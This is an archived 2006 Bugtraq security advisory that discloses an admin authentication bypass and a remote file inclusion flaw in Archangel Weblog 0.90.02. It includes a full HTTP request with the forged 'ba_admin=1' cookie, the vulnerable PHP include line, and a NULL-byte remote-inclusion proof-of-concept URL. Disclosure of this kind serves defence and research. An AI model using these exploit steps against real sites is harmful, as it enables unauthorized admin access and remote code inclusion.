[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060226132345.11017.qmail@securityfocus.com>
Date: 26 Feb 2006 13:23:45 -0000
From: kingofska@...il.com
To: bugtraq@...urityfocus.com
Subject: Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote
File Inclusion
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
KingOfSka - http://www.cpc.info.ms
Contro Potere Crew Advisories #5 26/02/2006
http://www.archangelmgt.com/
Archangel Weblog 0.90.02 Admin Authentication Bypass & Remote File Inclusion
#########################################################
#1:. Background :
Archangel Weblog is a new, full featured weblog application. Written in PHP and using a MySQL database backend, Archangel Weblog is easy to install, easy to configure and customize, and easy to use for most anyone.
#2:. The Bug :
The bug is caused by an insufficient filtering of user submitted input.A malicious user, could easily forge cookies to obtain unauthorized administrator credentials, and trhough the administration panel is possible to perform a Local\Remote File Inclusion.
#3:. Exploiting :
To get administrator access to the weblog script, just use a get request like this:
[http get request]
GET http://127.0.0.1/awb/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ba_admin=1
Cache-Control: max-age=0
[/http get request]
or just add the cookie to your request..
Now, take a look at /admin/index.php , line 54:
<?php include($index . ".php"); ?>
So, arbitrary file inclusion is possible, by using NULL char to filter out the .php extension.
PoC:
http://127.0.0.1/awb/admin/index.php?index=http://www.google.it%00
#4:. Vendor Status / Patch :
No Contact
#5:. Links :
http://contropotere.netsons.org/kingofska.asc - Public GnuPG Key
http://contropotere.netsons.org - Contro Potere Crew Forums , here you can ask for an unofficial patch or for more info.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iQEVAwUBRAGtT3X+WtVr4QeuAQLX7wf+Jlgo5XekN+Bccqh7rl/5NJEcGkdWBtRo
aQRzveUw2NYVdeBSTCszsSfWwW2fiAfPqWqQTQlrzNQNvka2Q34MO1qBxZ//6L0L
Cu8GrAbNIUwb8jeK4nOLSG9hoBJ/2Nh+GRk4C39Rqtr7i5kQl28Ca4MDi21eID2K
u/K7dWQlIFrQcfHPUSFjGNTdMu5mHycKmUEl52KYdofUG5pHDW0cX4deZNcc93L8
ZNMFKCXL6XM0x42/xdmUWpP0ySMpMVoRJxpGS1WCUtpTqorPQPq025ZIB91l9E8j
x9UaRiRzy4mS7kTN5+mOl/3yZUoN+KsFo9HY7WPL3BBD2Z+wAU2Wbg==
=bJwT
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists